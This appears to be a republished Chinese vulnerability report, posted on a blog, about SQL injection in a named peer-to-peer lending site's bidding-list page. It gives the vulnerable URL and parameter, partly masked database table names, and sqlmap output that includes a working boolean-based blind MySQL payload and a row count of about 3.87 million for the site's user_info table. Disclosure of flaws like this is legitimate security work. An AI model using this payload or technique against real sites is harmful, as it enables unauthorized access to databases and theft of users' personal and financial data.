文章出處

切入點:https://pay.xiangshang360.com/xweb/bidding/list?period=180-1000&interest=13.0-1000.0&orderByCondition=&pageNum=1&_=1446837749753

11.png

***** xian*****

*****: u**********olu**********--------+--**********        | T**********--------+--**********        | b**********        | b**********        | b**********        | b**********        | b**********        | d**********        | d**********        | v**********        | b**********        | b**********        | v**********        | i**********        | b**********_huifu  | b**********        | b**********        | v**********        | d**********        | v**********        | b**********        | v**********        | v**********        | v**********        | d**********        | i**********ge      | b**********aw_cash | b**********        | v**********        | b**********        | v**********        | v**********        | v**********        | b**********--------+--*****

獲取下用戶的數據數量

12.png

用戶的數據數量

12.png

sqlmap resumed the following injection point(s) from stored session:---Parameter: orderByCondition (GET)    Type: boolean-based blind    Title: MySQL >= 5.0 boolean-based blind - Parameter replace    Payload: period=180-1000&interest=0.0-9.0&orderByCondition=(SELECT (CASE WHEN (5464=5464) THEN 5464 ELSE 5464*(SELECT 5464 FROM INFORMATION_SCHEMA.CHARACTER_SETS) END))&pageNum=1&_=1446837749750---back-end DBMS: MySQL 5.0select count(*) from user_info:    '3872582'

 

就愛閱讀www.92to.com網友整理上傳,為您提供最全的知識大全,期待您的分享,轉載請注明出處。
歡迎轉載:http://www.kanwencang.com/bangong/20161116/56018.html

文章列表


不含病毒。www.avast.com
arrow
arrow
    全站熱搜

    大師兄 發表在 痞客邦 留言(0) 人氣()